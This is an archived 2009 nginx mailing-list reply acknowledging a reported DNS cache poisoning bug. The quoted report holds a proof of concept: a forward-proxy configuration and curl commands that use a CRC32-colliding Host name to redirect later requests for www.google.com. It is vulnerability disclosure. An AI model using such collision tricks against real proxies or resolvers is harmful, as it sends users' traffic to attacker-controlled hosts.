[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: nginx internal DNS cache poisoning



Hello!

On Wed, Sep 16, 2009 at 04:15:14PM -0700, Matthew Dempsky wrote:

> nginx maintains an internal DNS cache for resolved domain names.
> However, when searching the cache, nginx only checks that the crc32 of
> the names match and that the shorter name is a prefix of the longer
> name.  It does not check that the names are equal in length.

Looks like a bug, thanks.

> One way to exploit this is if nginx is configured as a forward proxy.
> This is an atypical use case, but it has been discussed on the nginx
> mailing list before[1].
> 
> For example, using this nginx.conf:
> 
>     events {
>       worker_connections  1024;
>     }
> 
>     http {
>       resolver 4.2.2.4;
>       server {
>         listen 8080;
>         location / {
>           proxy_pass http://$http_host$request_uri;
>         }
>       }
>     }

Note that this configuration isn't supported (and message you 
refer to explicitly marks it as such).  I believe using nginx as 
forward proxy (or even reverse proxy to untrusted backends) may 
have other security implications as well.  Don't do this, it 
hurts.

Maxim Dounin


> 
> You can then run curl to see the cache poisoning in effect:
> 
>     $ curl -H 'Host: www.google.com.9nyz309.crc32.dempsky.org'
> http://127.0.0.1:8080/
>     <html>
>     <body>
>     Ho hum, nothing to see here, move along please.
>     </body>
>     </html>
> 
>     $ curl -H 'Host: www.google.com' http://127.0.0.1:8080/
>     <html>
>     <body>
>     Oops, you shouldn't be asking me for http://www.google.com/!
>     </body>
>     </html>
> 
> (Restart nginx and run only the second command to see its expected
> behavior; i.e., actually fetching http://www.google.com/.)
> 
> This works because crc32("www.google.com.") ==
> crc32("www.google.com.9nyz309.crc32.dempsky.org.").  The first request
> cached the IP address for www.google.com.9nyz309.crc32.dempsky.org,
> and then the second request used this IP address instead of querying
> for www.google.com's real IP address because of the matching CRCs and
> the common prefix.
> 
> [1] http://marc.info/?l=nginx&m=125257590425747&w=2
>